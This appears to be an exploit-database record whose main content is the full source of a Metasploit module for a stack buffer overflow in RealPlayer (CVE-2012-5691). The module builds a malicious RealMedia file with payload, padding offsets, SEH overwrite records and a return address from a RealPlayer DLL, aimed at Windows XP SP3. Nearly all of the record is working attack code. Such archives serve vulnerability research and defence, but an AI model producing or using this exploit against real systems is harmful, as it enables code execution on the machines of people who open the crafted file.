{"id": "EDB-ID:23694", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "RealPlayer - '.RealMedia' File Handling Buffer Overflow (Metasploit)", "description": "", "published": "2012-12-27T00:00:00", "modified": "2012-12-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/23694", "reporter": "Metasploit", "references": [], "cvelist": ["2012-5691"], "immutableFields": [], "lastseen": "2022-01-13T06:27:58", "viewCount": 13, "enchantments": {"dependencies": {}, "score": {"value": 6.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2012-5691"]}]}, "exploitation": null, "vulnersScore": 6.9}, "sourceHref": "https://www.exploit-db.com/download/23694", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\tinclude Msf::Exploit::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'RealPlayer RealMedia File Handling Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14.\r\n\t\t\t\tThe vulnerability exists in the handling of real media files, due to the insecure\r\n\t\t\t\tusage of the GetPrivateProfileString function to retrieve the URL property from an\r\n\t\t\t\tInternetShortcut section.\r\n\r\n\t\t\t\tThis module generates a malicious rm file which must be opened with RealPlayer via\r\n\t\t\t\tdrag and drop or double click methods. It has been tested successfully on Windows\r\n\t\t\t\tXP SP3 with RealPlayer 15.0.5.109.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'suto <suto[at]vnsecurity.net>' # Vulnerability discovery, metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-5691' ],\r\n\t\t\t\t\t[ 'OSVDB', '88486' ],\r\n\t\t\t\t\t[ 'BID', '56956' ],\r\n\t\t\t\t\t[ 'URL', 'http://service.real.com/realplayer/security/12142012_player/en/' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => 'process'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 2000\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP3 / Real Player 15.0.5.109',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x63f2b4b5, # ppr from rpap3260.dll\r\n\t\t\t\t\t\t\t'OffsetOne' => 2312, # Open via double click\r\n\t\t\t\t\t\t\t'OffsetTwo' => 2964 # Open via drag and drop\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Dec 14 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tbuffer = payload.encoded\r\n\t\tbuffer << rand_text(target['OffsetOne'] - buffer.length) # Open the file via double click\r\n\t\tbuffer << generate_seh_record(target.ret)\r\n\t\tbuffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"call $-#{target['OffsetOne'] + 8}\").encode_string\r\n\t\tbuffer << rand_text(target['OffsetTwo'] - buffer.length) # Open the file via drag and drop to the real player\r\n\t\tbuffer << generate_seh_record(target.ret)\r\n\t\tbuffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"call $-#{target['OffsetTwo'] + 8}\").encode_string\r\n\t\tbuffer << rand_text(7000) # Generate exception\r\n\r\n\t\tcontent = \"[InternetShortcut]\\nURL=\"\r\n\t\tfilecontent = content+buffer\r\n\r\n\t\tfile_create(filecontent)\r\n\r\n\tend\r\nend", "osvdbidlist": ["88486"], "exploitType": "remote", "verified": true, "_state": {"dependencies": 1645412510}}